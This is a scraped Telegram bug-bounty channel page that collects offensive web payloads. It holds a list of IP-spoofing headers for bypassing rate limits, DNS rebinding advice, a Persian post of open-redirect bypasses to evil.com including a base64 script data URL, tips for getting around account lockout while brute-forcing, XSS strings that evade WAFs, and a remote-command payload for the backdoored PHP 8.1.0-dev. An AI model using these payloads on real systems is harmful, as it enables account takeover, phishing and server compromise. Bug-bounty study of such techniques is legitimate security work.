ch
Feedback
Bug Bounty - GitBook

Bug Bounty - GitBook

前往频道在 Telegram
7 429
订阅者
+424 小时
+207
+16430
帖子存档
Rate Limit Bypass using HTTP Headers
CACHE_INFO: 127.0.0.1
CF_CONNECTING_IP: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
CLIENT_IP: 127.0.0.1
Client-IP: 127.0.0.1
COMING_FROM: 127.0.0.1
CONNECT_VIA_IP: 127.0.0.1
FORWARD_FOR: 127.0.0.1
FORWARD-FOR: 127.0.0.1
FORWARDED_FOR_IP: 127.0.0.1
FORWARDED_FOR: 127.0.0.1
FORWARDED-FOR-IP: 127.0.0.1
FORWARDED-FOR: 127.0.0.1
FORWARDED: 127.0.0.1
HTTP-CLIENT-IP: 127.0.0.1
HTTP-FORWARDED-FOR-IP: 127.0.0.1
HTTP-PC-REMOTE-ADDR: 127.0.0.1
HTTP-PROXY-CONNECTION: 127.0.0.1
HTTP-VIA: 127.0.0.1
HTTP-X-FORWARDED-FOR-IP: 127.0.0.1
HTTP-X-IMFORWARDS: 127.0.0.1
HTTP-XROXY-CONNECTION: 127.0.0.1
PC_REMOTE_ADDR: 127.0.0.1
PRAGMA: 127.0.0.1
PROXY_AUTHORIZATION: 127.0.0.1
PROXY_CONNECTION: 127.0.0.1
Proxy-Client-IP: 127.0.0.1
PROXY: 127.0.0.1
REMOTE_ADDR: 127.0.0.1
Source-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Via: 127.0.0.1
VIA: 127.0.0.1
WL-Proxy-Client-IP: 127.0.0.1
X_CLUSTER_CLIENT_IP: 127.0.0.1
X_COMING_FROM: 127.0.0.1
X_DELEGATE_REMOTE_HOST: 127.0.0.1
X_FORWARDED_FOR_IP: 127.0.0.1
X_FORWARDED_FOR: 127.0.0.1
X_FORWARDED: 127.0.0.1
X_IMFORWARDS: 127.0.0.1
X_LOCKING: 127.0.0.1
X_LOOKING: 127.0.0.1
X_REAL_IP: 127.0.0.1
X-Backend-Host: 127.0.0.1
X-BlueCoat-Via: 127.0.0.1
X-Cache-Info: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-For: 127.0.0.1, 127.0.0.1, 127.0.0.1
X-Forwarded-Server: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-From-IP: 127.0.0.1
X-From: 127.0.0.1
X-Gateway-Host: 127.0.0.1
X-Host: 127.0.0.1
X-Ip: 127.0.0.1
X-Original-Host: 127.0.0.1
X-Original-IP: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originally-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-ProxyMesh-IP: 127.0.0.1
X-ProxyUser-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-True-Client-IP: 127.0.0.1
XONNECTION: 127.0.0.1
XPROXY: 127.0.0.1
XROXY_CONNECTION: 127.0.0.1
Z-Forwarded-For: 127.0.0.1
ZCACHE_CONTROL: 127.0.0.1

Rate Limit Bypass using HTTP Headers
CACHE_INFO: 127.0.0.1
CF_CONNECTING_IP: 127.0.0.1
CF-Connecting-IP: 127.0.0.1
CLIENT_IP: 127.0.0.1
Client-IP: 127.0.0.1
COMING_FROM: 127.0.0.1
CONNECT_VIA_IP: 127.0.0.1
FORWARD_FOR: 127.0.0.1
FORWARD-FOR: 127.0.0.1
FORWARDED_FOR_IP: 127.0.0.1
FORWARDED_FOR: 127.0.0.1
FORWARDED-FOR-IP: 127.0.0.1
FORWARDED-FOR: 127.0.0.1
FORWARDED: 127.0.0.1
HTTP-CLIENT-IP: 127.0.0.1
HTTP-FORWARDED-FOR-IP: 127.0.0.1
HTTP-PC-REMOTE-ADDR: 127.0.0.1
HTTP-PROXY-CONNECTION: 127.0.0.1
HTTP-VIA: 127.0.0.1
HTTP-X-FORWARDED-FOR-IP: 127.0.0.1
HTTP-X-IMFORWARDS: 127.0.0.1
HTTP-XROXY-CONNECTION: 127.0.0.1
PC_REMOTE_ADDR: 127.0.0.1
PRAGMA: 127.0.0.1
PROXY_AUTHORIZATION: 127.0.0.1
PROXY_CONNECTION: 127.0.0.1
Proxy-Client-IP: 127.0.0.1
PROXY: 127.0.0.1
REMOTE_ADDR: 127.0.0.1
Source-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Via: 127.0.0.1
VIA: 127.0.0.1
WL-Proxy-Client-IP: 127.0.0.1
X_CLUSTER_CLIENT_IP: 127.0.0.1
X_COMING_FROM: 127.0.0.1
X_DELEGATE_REMOTE_HOST: 127.0.0.1
X_FORWARDED_FOR_IP: 127.0.0.1
X_FORWARDED_FOR: 127.0.0.1
X_FORWARDED: 127.0.0.1
X_IMFORWARDS: 127.0.0.1
X_LOCKING: 127.0.0.1
X_LOOKING: 127.0.0.1
X_REAL_IP: 127.0.0.1
X-Backend-Host: 127.0.0.1
X-BlueCoat-Via: 127.0.0.1
X-Cache-Info: 127.0.0.1
X-Forward-For: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-For: 127.0.0.1, 127.0.0.1, 127.0.0.1
X-Forwarded-Server: 127.0.0.1
X-Forwarded-Host: 127.0.0.1
X-From-IP: 127.0.0.1
X-From: 127.0.0.1
X-Gateway-Host: 127.0.0.1
X-Host: 127.0.0.1
X-Ip: 127.0.0.1
X-Original-Host: 127.0.0.1
X-Original-IP: 127.0.0.1
X-Original-Remote-Addr: 127.0.0.1
X-Original-Url: 127.0.0.1
X-Originally-Forwarded-For: 127.0.0.1
X-Originating-IP: 127.0.0.1
X-ProxyMesh-IP: 127.0.0.1
X-ProxyUser-IP: 127.0.0.1
X-Real-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-True-Client-IP: 127.0.0.1
XONNECTION: 127.0.0.1
XPROXY: 127.0.0.1
XROXY_CONNECTION: 127.0.0.1
Z-Forwarded-For: 127.0.0.1
ZCACHE_CONTROL: 127.0.0.1
For more join to channel (: https://t.me/rootdr_research #Web #Payloads #bugbounty

If the target does not cache the DNS query then use dns rebinding to bypass security mechanism. For example: The server check's if the attacker.com does not point to localhost then the server makes a request to the attacker.com Use dns rebinding to bypass it. First set the ip to something valid, then when the dns request comes to attacker.com quickly change it to localhost.

🚀 بررسی  بای‌پس‌های بروز برای Open Redirect اینجا می‌خوام یه سری از بای‌پس‌های جدید و خلاقانه برای باگ Open Redirect رو بهتون بگم که باهاش راحت می‌تونین  بایپس کنین! 🔥 اول از همه، تکنیک Subdomain Overloading اگه سایت گیر بده که فقط دامنه خودش معتبره، می‌تونین از ساب‌دامین جعلی استفاده کنین: site.com/login?url=https://site.com.evil.com اینجا دامنه اصلی رو اول گذاشتیم، اما دامنه مخرب توش مخفی شده و می‌تونین راحت ریدایرکت کنین. 🔥 بازی با TLD و Encoding اینم یه روش توپ دیگه واسه بای‌پس کردن: site.com/login?url=https://evil.com/%2E%2E%2E%2F یا با هشتگ: site.com/login?url=https://evil.com#site.com اینجوری سرور فکر می‌کنه که دامنه اصلی معتبره. 🔥 Unicode ! site.com/login?url=https://evil.com%5Csite.com یا: site.com/login?url=https://evil.com%EF%BC%8Fsite.com 🔥 Open URL Wrapping اگه دیدین سایت گیر میده، از لینک‌های واسطه استفاده کنین. مثلا گوگل رو وسط ماجرا بندازین: site.com/login?url=https://google.com/url?q=https://evil.com خیلی جاها این جواب میده. 🔥 Data URL Injection و اما شاهکار پایانی! با استفاده از Data URL می‌تونین مستقیم کد مخرب بندازین تو حلق سایت: site.com/login?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnU3VwZXIhJyk8L3NjcmlwdD4= خیلی حرفه‌ای می‌تونین حمله کنین و تاثیرشو نشون بدین. 💡 جمع‌بندی این بای‌پس‌ها رو تست کنین: ساب‌دامین جعلی کدگذاری مثل %2E و %5C لینک‌های واسطه مثل گوگل Data URL برای تزریق داده یادتون نره اگه تکنیک جدیدی پیدا کردین اینجا کامنت کنین تا بقیه هم یاد بگیرن! 🧑‍💻 دنیای باگ بانتی یعنی خلاقیت! https://t.me/rootdr_research #web #bugbountt

You've been brute forcing an account but suddenly the account is locked. Try this methods to bypass the locking mechanism: 1. Try to spoof the ip address using X-headers, hop by hop headers and etc .... 2. Use verb tampering to your advantage. 3. Try changing the request type. 4. Some times using crlf or null byte helps you out. And etc ....

<42 foo="<img src=x onerror=alert(1)//">test</42>

<22 foo="<img src=x onerror='alert(1)'">test</22>
this payload may help you to bypass WAF or trick sanitizers

List of 1400 write-ups and reports from the HackerOne site A great list where you can access a bank of write-ups based on your needs. A lot of time has definitely been spent on this file, I hope you get the most out of it.

Circle of XSS WAF protection using invisible dividers before or after the name of the function <IMG/SRC/ONERROR = ALERT (1337)> <svg/onload = alert (2)> Explanation: You can insert invisible detector symbols (for example, Zero Width No-Break Space, Zero Width Space or inextricable gap) before or after the function of the function (for example, Alert). This helps to get around the filters and WAF (Web Application Firewall), which do not expect such characters inside the function of the function, and therefore do not block such attacks. http://GitBook_s.t.me

!

Who joined these channels
+1
Who joined these channels

Find a server running PHP 8.1.0-dev ❓ 🚨 Check for easy RCE 🚨 👇 Payload: User-Agentt: zerodiumsleep(5); User-Agentt: zerodi
Find a server running PHP 8.1.0-dev ❓ 🚨 Check for easy RCE 🚨 👇 Payload: User-Agentt: zerodiumsleep(5); User-Agentt: zerodiumsystem('id'); #bugbountytips #bugbounty

avatar
Unlock fortelegram star1

#Reports @GitBook_s
#Reports @GitBook_s